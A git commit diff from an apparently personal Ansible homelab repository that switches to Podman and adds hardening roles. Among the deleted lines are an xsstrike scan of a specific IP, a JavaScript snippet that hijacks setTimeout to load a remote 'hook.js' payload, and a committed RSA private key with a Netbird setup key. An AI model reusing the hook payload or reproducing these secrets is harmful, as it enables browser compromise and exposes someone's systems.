[First commit with podman setup]

2026-01-20 20:29:05 +01:00
parent 151eba6ffd
commit 7f760cf4a6
15 changed files with 262 additions and 294 deletions
--- a/README.md
+++ b/README.md
@@ -1,25 +1,21 @@
 # semaphore

 ```
- python3 xsstrike.py -u https://147.135.51.88/login
-(function() {
-    const originalSetTimeout = window.setTimeout;
-    window.setTimeout = function(fn, delay) {
-        if (delay > 0) {
-            const wrapped = function() {
-                if (!window.xetLoaded) {
-                    var s = document.createElement('script');
-                    s.src = 'https://xet.jingoh.fr/hook.js';
-                    document.head.appendChild(s);
-                    window.xetLoaded = true;
-                }
-                return fn.apply(this, arguments);
-            };
-            return originalSetTimeout(wrapped, delay);
-        }
-        return originalSetTimeout(fn, delay);
-    };
-})();
+ 
+# hardening
+
+https://github.com/linux-system-roles/sudo => ansible-galaxy role install linux-system-roles.sudo
+singleplatform-eng.users
+dev-sec.os_hardening :
+dev-sec.ssh_hardening :
+geerlingguy.firewall :
+jnv.unattended-upgrades
+ 
+ 
+# apps stacks
+ 
+https://github.com/alvistack/ansible-role-podman => installation podman
+https://github.com/linux-system-roles/podman => manager pod like Kubernetes / services
 ```


@@ -40,83 +36,3 @@ Add
 - package
 - firewall

-
-
-flux bootstrap gitea --owner=staffadmin --repository=cluster --private=false --personal=true --path=./clusters/test --hostname gitea.jingoh.fr --read-write-key=true
-
-GITEA_TOKEN=fdsfsd
-
-==> delete secret in flux-system
-
-┌─[stephane@staff] - [~] - [2024-08-28 01:05:37]
-└─[130] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth 
-► connecting to gitea.jingoh.fr
-► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git"
-✔ cloned repository
-► generating component manifests
-✔ generated component manifests
-✔ component manifests are up to date
-► installing components in "flux-system" namespace
-✔ installed components
-✔ reconciled components
-► determining if source secret "flux-system/flux-system" exists
-► generating source secret
-► applying source secret "flux-system/flux-system"
-✔ reconciled source secret
-► generating sync manifests
-✔ generated sync manifests
-✔ sync manifests are up to date
-► applying sync manifests
-✔ reconciled sync configuration
-◎ waiting for GitRepository "flux-system/flux-system" to be reconciled
-✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed'
-◎ waiting for Kustomization "flux-system/flux-system" to be reconciled
-✗ client rate limiter Wait returned an error: context deadline exceeded
-► confirming components are healthy
-✔ helm-controller: deployment ready
-✔ kustomize-controller: deployment ready
-✔ notification-controller: deployment ready
-✔ source-controller: deployment ready
-✔ all components are healthy
-✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': authorization failed'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded
-
-
-
-
-
-┌─[stephane@staff] - [~] - [2024-08-28 01:13:04]
-└─[1] <> flux bootstrap gitea --owner=staffadmin --repository=cluster --private=true --personal=true --path=clusters/test --hostname gitea.jingoh.fr --token-auth 
-► connecting to gitea.jingoh.fr
-► cloning branch "main" from Git repository "https://gitea.jingoh.fr/staffadmin/cluster.git"
-✔ cloned repository
-► generating component manifests
-✔ generated component manifests
-✔ component manifests are up to date
-► installing components in "flux-system" namespace
-✔ installed components
-✔ reconciled components
-► determining if source secret "flux-system/flux-system" exists
-► generating source secret
-► applying source secret "flux-system/flux-system"
-✔ reconciled source secret
-► generating sync manifests
-✔ generated sync manifests
-✔ sync manifests are up to date
-► applying sync manifests
-✔ reconciled sync configuration
-◎ waiting for GitRepository "flux-system/flux-system" to be reconciled
-✗ gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving'
-◎ waiting for Kustomization "flux-system/flux-system" to be reconciled
-✗ client rate limiter Wait returned an error: context deadline exceeded
-► confirming components are healthy
-✔ helm-controller: deployment ready
-✔ kustomize-controller: deployment ready
-✔ notification-controller: deployment ready
-✔ source-controller: deployment ready
-✔ all components are healthy
-✗ bootstrap failed with 2 health check failure(s): [error while waiting for GitRepository to be ready: 'gitrepository 'flux-system/flux-system' not ready: 'failed to checkout and determine revision: unable to clone 'https://gitea.jingoh.fr/staffadmin/cluster.git': Get "https://gitea.jingoh.fr/staffadmin/cluster.git/info/refs?service=git-upload-pack": dial tcp: lookup gitea.jingoh.fr on 10.43.0.10:53: server misbehaving'', error while waiting for Kustomization to be ready: 'client rate limiter Wait returned an error: context deadline exceeded']
-
-
-
-
-# docker run -d  -p 127.0.0.1:8000:8080  -e DATA_ROOT=/DATA  -v /DATA:/DATA -v /var/run/docker.sock:/var/run/docker.sock  --name casaos casaos
--- a/39
+++ b/39
@@ -1,29 +1,16 @@
-# -*- mode: ruby -*-
-# vi: set ft=ruby :
-
-NNODES=2
-
-$script = <<-SCRIPT
-echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClVS1uxDfwS6OusQ4qgcZ6hBc8YRBE8MyXu0sUfGN7S3itjI3W2ixD18v80el8dVQVR12jCY0ueavgoV1cHrfGWkFoLKi+QrA4MuSNUChj0NBbyLTmdwPvne8LRv3ttCbRSJ/6bIEveX8y/7kGn/R1NDFlfE6b5R8ersBUKCQM6YxblAkv/XH8cJlQXhr1nLhVOl/ae+Q/pTCbgioB8qrmGEuMvOLmavcFf7IJbJcSgeiXSOnyIRl2n64X6lbRK+MRZ61pF6vAOXA+Ixyt/fAbO7sjqU0+cEhU5Br5/VcqG4Bc5nhWimtXIHPry3aLV5PtN6K9/i3eA5F6Jpa82JzmUMEbWSBIga02yIw9GjRyAI6ccH/kJGuB6QN5/YwGHpOF2f0FGiEAbUz41mLngN3SsXL1pdV2hT3x56/GIcGe6p/f1cytwVCyOaE7W87B05w5JYb1sSFj6QuGW0rHWfnHT5SY87Mk/H8VgZPaPbm+hSjLIQRAmUYQR+Rub1o9bXE=" >> /home/vagrant/.ssh/authorized_keys
-SCRIPT
-
-# All Vagrant configuration is done below. The "2" in Vagrant.configure
-# configures the configuration version (we support older styles for
-# backwards compatibility). Please don't change it unless you know what
-# you're doing.
 Vagrant.configure("2") do |config|
-  (0..NNODES - 1).each do |i|
-    config.vm.define "k8s-ubuntu-#{i}" do |node|
-      #node.vm.box = "ubuntu/focal64"
-      node.vm.box = "ubuntu/jammy64"
-      node.vm.hostname = "k8s-ubuntu-#{i}"
-      config.vm.provider "virtualbox" do |v|
-          v.memory = 2048
-          v.cpus = 2
-      end
-      node.vm.network "private_network", ip: "192.168.25.11#{i}"
-      node.vm.provision "shell", inline: $script
-      node.vm.provision "shell", inline: "echo hello from node #{i}"
-    end
+  config.vm.box = "generic/ubuntu2204"
+  config.vm.network "private_network", type: "dhcp"
+  # config.vm.network :hostonly, "192.168.1.21"
+  config.vm.synced_folder ".", "/vagrant", disabled: true
+  config.vm.provider "qemu" do |qe|
+    qe.qemu_dir = "/usr/bin/"
+    qe.arch="x86_64"
+    qe.memory = "2048"
+    qe.smp = "4"
+    qe.machine = "q35"
+    qe.cpu = "max"
+    qe.net_device = "virtio-net-pci"
  end
 end
+
--- a/collections/requirements.yml
+++ b/collections/requirements.yml
@@ -5,8 +5,9 @@ collections:
  # - name: ansible.utils
  # # - name: community.grafana
  - name: community.docker
-  #! bitwarden
  - name: bitwarden.secrets
+  - name: devsec.hardening
+  - name: fedora.linux_system_roles
  # - name: community.general
  # # - name: geerlingguy.redis
  # # - name: git+https://github.com/netways/ansible-collection-elasticstack.git
--- a/files/swarm/config/traefik-dynamic-configuration.yml
+++ b/files/swarm/config/traefik-dynamic-configuration.yml
@@ -1,4 +0,0 @@
-tls:
-  certificates:
-    - certFile: /run/secrets/wildcard-jingoh-private.crt
-      keyFile: /run/secrets/wildcard-jingoh-private.key
--- a/files/swarm/tls/jingoh.private.crt
+++ b/files/swarm/tls/jingoh.private.crt
@@ -1,22 +0,0 @@
-----BEGIN CERTIFICATE-----
-MIIDrzCCApegAwIBAgIUKJ9Qnulnmv91wS0XQXuFAAJTLOkwDQYJKoZIhvcNAQEL
-BQAwcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4wDAYD
-VQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gxFzAV
-BgNVBAMMDmppbmdvaC5wcml2YXRlMB4XDTI0MDQxNzE5MDIxMloXDTM0MDQxNTE5
-MDIxMlowcTELMAkGA1UEBhMCRlIxFzAVBgNVBAgMDklsZXMtZGUtZnJhbmNlMQ4w
-DAYDVQQHDAVQYXJpczEPMA0GA1UECgwGamluZ29oMQ8wDQYDVQQLDAZqaW5nb2gx
-FzAVBgNVBAMMDmppbmdvaC5wcml2YXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
-MIIBCgKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8iYXm
-Xy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+LpKZZ
-f8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIxIZ7X
-SK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF11225Y0e
-nn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZjb0Qy
-B2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABoz8wPTAJBgNVHRMEAjAAMBsG
-A1UdEQQUMBKCECouamluZ29oLnByaXZhdGUwEwYDVR0lBAwwCgYIKwYBBQUHAwEw
-DQYJKoZIhvcNAQELBQADggEBAJ2hJ5SW9TD9yLecxG++x/jl32oxYJ/EyDPXZNHw
-fAb+9YmniThDEJTJ2RJTOIhZz6uqdjfP+37sFDu17SMvxauG78RIYSaTGnIaoiXt
-v5Uh4apUR1DOOPoZoUX82ZQJEJ5LenO+EFHevYbzgcDW61T/oByPwK8FOtLqQMHe
-SC09WsGyLQ/hls+4EgxQFyl7UN5T9NK6xrQrHwNbV0IgHcnGcTSkzRj4mt1nzsdh
-Enq/Ztz9iefxqDvHPFRRtcqDv+Ozh7zSuxVfP3tb7+5Ak7j/0Txi5NAbo+F3opAD
-8eeY2dTgxc9sV1esvB305zgl4SUkfLD+BDjOjn/NvWFj2i0=
-----END CERTIFICATE-----
--- a/files/swarm/tls/jingoh.private.key
+++ b/files/swarm/tls/jingoh.private.key
@@ -1,27 +0,0 @@
-----BEGIN RSA PRIVATE KEY-----
-MIIEowIBAAKCAQEAuvwbT5XwP4wOhPLubWk7KBdt1+taFV/YNIkx+Ky9Nb+eceJ8
-iYXmXy9bRK0WTdTiwOLC60h3WigsMMPc8sI1FiW3jfHMU8Z2GqJTHFM6CP1LcN+L
-pKZZf8pZu3ONMhTcaPGvGYH+GAdi8Qk7rRskirZlImsA6lGDoteKKF/Xc4Y6IoIx
-IZ7XSK7klO/qN0ZPHWiu9QAtNBc4vVZEz83aXEbKH7eCOtSz07cOIT6yrvUF1122
-5Y0enn+DOLEcBBwI5KLco0udERz/Epn90eUWgbibP4QIaVQJypFC17RU3fXkiqZj
-b0QyB2WEYi8awyB6KgZfu1PvzuvHYuKugBeYVwIDAQABAoIBACqQz4rLgDiHIpsD
-TmGbzfqvcrLvgb9R5T74aGbKs/vzVhdozp7j23CZsDYvDN/E8aWlOWgkQ/9DG+Qy
-Ai9FJJ6ZEXL/s1ry19nyT+cnzxNSzgSw7vIZaFBd+RViFadr9kzxj8HHxNclf1GN
-n4cloajuIpG2OCwfSE8er/XG8535cc7aErTpuhj5EoqRtYy++VkiC0d3VSaCE/uW
-J1ulfGnaZ3qiJfr6o+0xlTPYFcK5pkm+3uvTdSYZeLSSJPfnnaqx7G8yxoVZ1QaH
-3Sey4Ax1Y8vGYtbJ2ZS7NlnBgbgSDPGimZMFfoGFThK4Y5AcqGIEByZvOSByXnQ6
-tHiB6OECgYEA3KJIThM+RtwAk17MoRvkdUl+iPj0k+Go7lJQycFgCeNfp2rylqYm
-K1/Hzo0rSueVVRO3iL+clxt3bYHHNk62nJnp+nnkAaETTs9A8QRwGk418BKw9HyR
-faSrmXkTgKlY+sWrwECP9SyLa80UPyWIyIeOqb/zvjfirRRaPRFQTrECgYEA2PUI
-HYSqia+iOm4XEOtlUMHbNnLhW/aFhBingABt/CMO0cPTCCYdEzS+xDZzF7MROHzd
-O6zJyLUtenTIwN3dcVTWCPCRxcAY4p6V/PjV0c/b0vteQ4WWFM/l6ubTAwX+uJih
-SQREkqseMPLAqeEX84yZfqb/N3s2N2GuGIbP6YcCgYEAsztlz38UbU3VbeJqC0r0
-WU896pmLXgLIT+ow1OUxVncOQpu/vB/3C+9ACoxlqfDdQALHauB1nc9jQmNV6Mki
-0a67A443ahdm7vOwhtqbEtOMP51/gO0c59t4xzEzZaassPMZphEMoRfxnr43f2DH
-cFemzkEwCcuuafoJoGhLO9ECgYA2yAg4i9sT0QlBf7LLTuTSM2DKqs9EjUbBSAhj
-Rbh/xcpkJPIQSK9mvha9LJJ7FXfvr3edLc/1oenN1dcq+9qCV02EDFqCeDLQZgKx
-UZOL2tRCvb3bhsuSjbwcSBRX2xeqPL/c0/sMnbCN433KZ0/I62OGm1wuAip6aWuw
-PboZ2QKBgFaEqOCUFMGHet0A/BOGkzkpCZsXl+EDqvx9l7s30vdv2NIoNR8V+Zl3
-B2arO/jGjDZnbGJcHG6B7WrCX8aJyM7Fm9akbreL7lWWzqKXs1lDHwAxqQN/TllI
-tO5XRx7AHoJXkEmzKAwQWAbKzRKLTp0x9lcOBGz8CR29oPxZI2/H
-----END RSA PRIVATE KEY-----
--- a/group_vars/all.yml
+++ b/group_vars/all.yml
@@ -1,38 +1,54 @@
 #* USERS 
+users:
+  - username: bot
+    name: bot user
+    # groups: ['wheel','systemd-journal']
+    # uid: 1000
+    home: /home/bot
+    # profile: |
+    #   alias ll='ls -lah'
+    ssh_key:
+      - "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7/ReeTsubS/KwTRaR/5k/6d5CEef0XTXvyRwfVBjwW"
+  - username: dbtest
+    name: dbtest user
+    # groups: ['wheel','systemd-journal']
+    # uid: 1000

-management_user_list:
-  - name: stephane
-    shell: '/bin/bash'
-    authorized_keys:
-      - key: "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClVS1uxDfwS6OusQ4qgcZ6hBc8YRBE8MyXu0sUfGN7S3itjI3W2ixD18v80el8dVQVR12jCY0ueavgoV1cHrfGWkFoLKi+QrA4MuSNUChj0NBbyLTmdwPvne8LRv3ttCbRSJ/6bIEveX8y/7kGn/R1NDFlfE6b5R8ersBUKCQM6YxblAkv/XH8cJlQXhr1nLhVOl/ae+Q/pTCbgioB8qrmGEuMvOLmavcFf7IJbJcSgeiXSOnyIRl2n64X6lbRK+MRZ61pF6vAOXA+Ixyt/fAbO7sjqU0+cEhU5Br5/VcqG4Bc5nhWimtXIHPry3aLV5PtN6K9/i3eA5F6Jpa82JzmUMEbWSBIga02yIw9GjRyAI6ccH/kJGuB6QN5/YwGHpOF2f0FGiEAbUz41mLngN3SsXL1pdV2hT3x56/GIcGe6p/f1cytwVCyOaE7W87B05w5JYb1sSFj6QuGW0rHWfnHT5SY87Mk/H8VgZPaPbm+hSjLIQRAmUYQR+Rub1o9bXE= stephane"
-        exclusive: yes
-    sudo:
-      hosts: ALL
-      as: ALL
-      commands: ALL
-      nopasswd: ALL
-
-
-#* GO 
-
-golang_gopath: /usr/local/go
-# golang_download_dir: /home/stephane/.ansible/tmp/downloads
+sudo_sudoers_files:
+  - path: /etc/sudoers.d/bot
+    user_specifications:
+      - users:
+          - bot
+        hosts:
+          - ALL
+        operators:
+          - ALL
+        commands:
+          - "NOPASSWD: ALL"

 #* PACKAGES

 package_repo:
  - python3-pip
-  #! argocd control plane
-  - sshpass
+  - podman
+  - lsof
+#   - libsemanage
+
+# package_pip:
+#   - python3-libsemanage
+


 #* FIREWALL

 firewall_allowed_tcp_ports:
  - "22"
+  - "2222"
  - "80"
+  - "8080"
  - "443"
  - "9100"
+  - "32222"
  # #! Kubernetes control plane ports 
  # - "6443"
  # - "2379"
@@ -44,22 +60,3 @@ firewall_allowed_tcp_ports:
  # - "3000"
  # - "9323"
 #! Kubernetes Worker ports 
-
-
-
-#* NETBIRD 
-
-netbird_setup_key: 33BE5022-D0CF-4ED9-84FF-B93E53519FDD
-netbird_register: true
-
-#* TLS 
-
-node_exporter_tls_server_config:
-  cert_file: /etc/node_exporter/tls.cert
-  key_file: /etc/node_exporter/tls.key
-
-#* NODE_EXPORTER
-
-# node_exporter_basic_auth_users:
-#   randomuser: examplepassword
-node_exporter_web_listen_address: "{{ host_private_address }}:9100"
--- a/hardening-linux.yml
+++ b/hardening-linux.yml
@@ -1,11 +1,34 @@
- hosts: all
+- hosts: localtest
+  #! Need first setup with root access user
  become: true
-  roles:
-    # #! need change for iphone ssh access
-    # - name: devsec.hardening.ssh_hardening
-    # #! be carefull 
-    # - name: devsec.hardening.os_hardening
+  pre_tasks:
+    - ansible.builtin.apt:
+        update_cache: yes

-# - community.general.ufw:
-#     state: enabled
-#     policy: allow
+    - ansible.builtin.apt:
+        name: "*"
+        state: latest
+
+    - ansible.builtin.apt:
+        upgrade: safe
+
+    - ansible.builtin.apt:
+        clean: yes
+
+    - ansible.builtin.apt:
+        name: "{{ item }}"
+        state: latest
+      loop: "{{ package_repo }}"
+      when: package_repo is defined
+
+    - ansible.builtin.pip:
+        name: "{{ item }}"
+      loop: "{{ package_pip }}"
+      when: package_pip is defined
+
+  roles:
+    - name: singleplatform-eng.users
+    - name: linux-system-roles.sudo
+    - name: devsec.hardening.ssh_hardening
+    - name: devsec.hardening.os_hardening
+    - name: geerlingguy.firewall
--- a/3
+++ b/3
@@ -4,6 +4,9 @@ scaleway ansible_host=163.172.84.28 ansible_user=stephane
 [tower]
 scaleway ansible_host=163.172.84.28 ansible_user=stephane

+; [localtest]
+; #! test ansible_host=ubuntu.orb.local ansible_user=ansible ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519 #! First setup 
+; test ansible_host=ubuntu.orb.local ansible_user=bot ansible_ssh_private_key_file=~/.orbstack/ssh/id_ed25519
 ; [local]
 ; localhost ansible_host=127.0.0.1 ansible_user=stephanegratias
 ; [cluster]
--- a/podman.yml
+++ b/podman.yml
@@ -0,0 +1,138 @@
+- hosts: localtest
+  become: true
+  vars:
+    #! SECRETS
+    # vaultwarden_url: "{{ lookup('env', 'vaultwarden_url') }}"
+    # bw_client_secret: "{{ lookup('env', 'bw_client_secret') }}"
+    # bw_client_password: "{{ lookup('env', 'bw_client_password') }}"
+    # bw_client_id: "{{ lookup('env', 'bw_client_id') }}"
+    # user_mail: "{{ lookup('env', 'mail') }}"
+    # user: "{{ lookup('env', 'username') }}"
+    # # Token full access gitea
+    # bw_requested_password_id: "{{ lookup('env', 'bw_requested_password_id') }}"
+    #! PODS
+    # podman_registries_conf:
+    #   aliases:
+    #     myregistry: quay.io
+    # podman_registry_username: test
+    # podman_registry_password: test
+    podman_create_host_directories: true
+    # podman_firewall:
+    #   - port: 8080-8081/tcp
+    #     state: enabled
+    #   - port: 12340/tcp
+    #     state: enabled
+    # podman_selinux_ports:
+    #   - ports: 8080-8081
+    #     setype: http_port_t
+    podman_kube_specs:
+      - state: started
+        run_as_user: bot
+        run_as_group: bot
+        kube_file_content:
+          apiVersion: v1
+          kind: Pod
+          metadata:
+            name: db
+          spec:
+            containers:
+              - name: db
+                image: docker.io/mysql:9
+                ports:
+                  - containerPort: 1234
+                    hostPort: 12340
+                volumeMounts:
+                  - mountPath: /var/lib/db:Z
+                    name: db
+            volumes:
+              - name: db
+                hostPath:
+                  path: /var/lib/db
+    # podman_secrets:
+    #   - name: mysql-root-password-container
+    #     state: present
+    #     skip_existing: true
+    #     data: "{{ root_password_from_vault }}"
+    #   - name: mysql-root-password-kube
+    #     state: present
+    #     skip_existing: true
+    #     data: |
+    #       apiVersion: v1
+    #       data:
+    #         password: "{{ root_password_from_vault | b64encode }}"
+    #       kind: Secret
+    #       metadata:
+    #         name: mysql-root-password-kube
+    #   - name: envoy-certificates
+    #     state: present
+    #     skip_existing: true
+    #     data: |
+    #       apiVersion: v1
+    #       data:
+    #         certificate.key: {{ key_from_vault | b64encode }}
+    #         certificate.pem: {{ cert_from_vault | b64encode }}
+    #       kind: Secret
+    #       metadata:
+    #         name: envoy-certificates
+      # - state: started
+      #   run_as_user: webapp
+      #   run_as_group: webapp
+      #   kube_file_src: /path/to/webapp.yml
+
+#! SECRETS
+  pre_tasks:
+    - name: Install Bitwarden CLI
+      ansible.builtin.command:
+        cmd: "{{ item }}"
+      delegate_to: localhost
+      loop: 
+        - apk add --no-cache nodejs npm
+        - npm install -g @bitwarden/cli 
+
+    - ansible.builtin.command:
+        cmd: bw logout
+      delegate_to: localhost
+      ignore_errors: true
+
+    - name: bitwarden token session 
+      ansible.builtin.shell: "{{ item }}"
+      environment:
+        BW_CLIENTID: "{{ bw_client_id }}"
+        BW_CLIENTSECRET: "{{ bw_client_secret }}"
+        BW_PASSWORD: "{{ bw_client_password }}"
+      loop:
+        - bw config server {{ vaultwarden_url }}
+        - bw login --apikey
+        - bw unlock --passwordenv BW_PASSWORD --raw
+      delegate_to: localhost
+      register: bw_session_result
+
+    - name: Get secret from Bitwarden
+      command:
+        argv:
+          - bw
+          - get
+          - password
+          - "{{ bw_requested_password_id }}"
+          - --session
+          - "{{ bw_session_result.results[-1].stdout | trim }}"
+      delegate_to: localhost
+      register: gitea_token_result
+      no_log: true
+      changed_when: false
+
+    # - name: Return all secrets from a path
+    #   ansible.builtin.debug: 
+    #     msg: "{{ gitea_token_result.stdout }}"
+    #   delegate_to: localhost
+
+    - ansible.builtin.set_fact:
+        gitea_token : "{{ gitea_token_result.stdout | trim }}"
+      no_log: true
+      delegate_to: localhost
+
+#! ROLES
+  roles:
+    #! By default, the files will be copied to or created in /etc/containers/systemd/$name.$type for root containers
+    #! and $HOME/.config/containers/systemd/$name.$type for rootless containers, on the managed node. 
+    - name: linux-system-roles.podman
--- a/roles/.gitignore
+++ b/roles/.gitignore
@@ -48,3 +48,11 @@ CTL-Fed-Security.ansible-grafana
 thomasjpfan.docker-swarm
 asg1612.dockerswarm
 gantsign.golang
+singleplatform-eng.users
+linux-system-roles.sudo
+devsec.hardening.os_hardening
+devsec.hardening.ssh_hardening
+geerlingguy.firewall
+alvistack.podman
+linux-system-roles.podman
+linux-system-roles.selinux
--- a/roles/requirements.yml
+++ b/roles/requirements.yml
@@ -13,6 +13,19 @@
 # - src: geerlingguy.kubernetes
 # PIP
 - src: geerlingguy.pip
+#! USER
+- src: singleplatform-eng.users
+- src: linux-system-roles.sudo
+#! HARDENING => collection 
+# - src: devsec.hardening.os_hardening
+# - src: devsec.hardening.ssh_hardening
+- src: geerlingguy.firewall
+- src: linux-system-roles.selinux
+#! PODS
+- src: alvistack.podman
+- src: linux-system-roles.podman
+# - src: fedora.linux_system_roles.firewall
+# jnv.unattended-upgrades
 # - src: asg1612.dockerswarm
 # SYSTEM
 # - src: tumf.systemd-service
--- a/screenshots/http---23.134.94.44-32132.jpeg
+++ b/screenshots/http---23.134.94.44-32132.jpeg
--- a/templates/alerts.sh.j2
+++ b/templates/alerts.sh.j2
@@ -1,63 +0,0 @@
-#!/bin/bash
-
-# Monitoring script
-
-# Secrets
-username="{{ alert_username }}"
-password="{{ alert_password }}"
-VAULT="{{ alert_vault }}"
-
-# Servers
-servers=({{ alert_list_server | join (' ') }})
-local_ip=$(hostname -I | awk '{print $1}')
-
-# SSL
-site="{{ alert_server_ssl }}"
-
-# Vérifier s'il y a un paramètre
-if [ $# -ne 1 ]; then
-    echo "Usage : $0 [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]"
-    exit 1
-fi
-
-# Récupérer le paramètre
-parametre="$1"
-
-# Vérifier la valeur du paramètre et afficher le résultat correspondant
-if [ "$parametre" = "storage" ]; then
-	[ $(df -h / | awk 'NR==2 {sub(/%/, "", $(NF-1)); print $(NF-1)}') -gt 80 ] && curl -u "$username:$password" -H "Title: Full Storage" -H "ta:card_index_dividers"  -d "90% used on `hostname`" https://alert.jingoh.fr/{{ alerts_storage }}
-elif [ "$parametre" = "load" ]; then
-        [ $(uptime | awk -F'load average: ' '{print $2}' | awk '{print $1}' | cut -d , -f1) '>' $(nproc) ] && curl -u "$username:$password" -H "Title: Load" -H "ta:battery"  -d "`hostname` Load with `uptime`" https://alert.jingoh.fr/{{ alerts_load }}
-elif [ "$parametre" = "ping" ]; then
-	for ip in "${servers[@]}"
-	do
-  	if [ "$ip" != "$local_ip" ]; then
-    		ping -c 1 "$ip" || curl -u "$username:$password" -H "Title: Ping Server" -H "ta:sos"  -d "Server ping failed from `hostname` to $ip" https://alert.jingoh.fr/{{ alerts_ping }}
-  	fi
-	done
-elif [ "$parametre" = "health" ]; then
-        [ $(curl -s -o /dev/null -w "%{http_code}" https://gitea.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service gitea" -H "ta:bangbang"  -d "No response From gitea.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }}
-	[ $(curl -s -o /dev/null -w "%{http_code}" https://vault.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service vault" -H "ta:bangbang"  -d "No response From vault.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }}
-	[ $(curl -s -o /dev/null -w "%{http_code}" https://homepage.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service homepage" -H "ta:bangbang"  -d "No response From homepage.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }}
-elif [ "$parametre" = "ssl" ]; then
-	expiration_timestamp=$(date -d "$(echo | openssl s_client -servername $site -connect $site:443 2>/dev/null | openssl x509 -noout -enddate | cut -d "=" -f 2)" +%s)
-	current_timestamp=$(date +%s)
-	difference=$((expiration_timestamp - current_timestamp))
-	threshold=$((20 * 24 * 3600))  # 20 jours en secondes
-	if [ $difference -lt $threshold ]; then
-		curl -u "$username:$password" -H "Title: HTTPS Certificats" -H "ta:closed_lock_with_key"  -d "*.jingoh.fr Less than 20 days" https://alert.jingoh.fr/{{ alerts_ssl }}
-	fi
-elif [ "$parametre" = "backup_git" ]; then
-	docker exec -u git -w /data/ gitea gitea dump -c /data/gitea/conf/app.ini
-	mv /opt/dockerapps/appdata/gitea/gitea/gitea-dump-*.zip /opt/dockerapps/backup/
-	docker exec gitea-db pg_dump -U root gitea > gitea-db-pg.sql
-	mv ./gitea-db-pg.sql /opt/dockerapps/backup/
-	curl -u "$username:$password" -H "Title: Backup gitea" -H "ta:inbox_tray"  -d "Local Backup gitea done !" https://alert.jingoh.fr/{{ alerts_backup_gitea }}
-elif [ "$parametre" = "backup_vault" ]; then
-	docker run --rm --volumes-from=vault -e UID=0 -e BACKUP_DIR=/data/backup -e TIMESTAMP=true -e ENCRYPTION_PASSWORD="$VAULT" bruceforce/vaultwarden-backup manual
-	curl -u "$username:$password" -H "Title: Backup vault" -H "ta:inbox_tray"  -d "Local Backup vault done !" https://alert.jingoh.fr/{{ alerts_backup_vault }}
-elif [ "$parametre" = "cpu" ]; then
-	[ "$(echo "$(ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }') > $(nproc) * 50" | bc)" -eq 1 ] && curl -u "$username:$password" -H "Title: CPU `nproc` cores" -H "ta:warning"  -d "High usage `ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }'`" https://alert.jingoh.fr/{{ alerts_cpu }}
-else
-    echo "Paramètre invalide : Utilisez [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]"
-fi
--- a/templates/docker-compose.yml.j2
+++ b/templates/docker-compose.yml.j2
@@ -1,2 +0,0 @@
-# {{ ansible_managed }}
-{{ dockerapp_compose | to_nice_yaml(indent=3) }}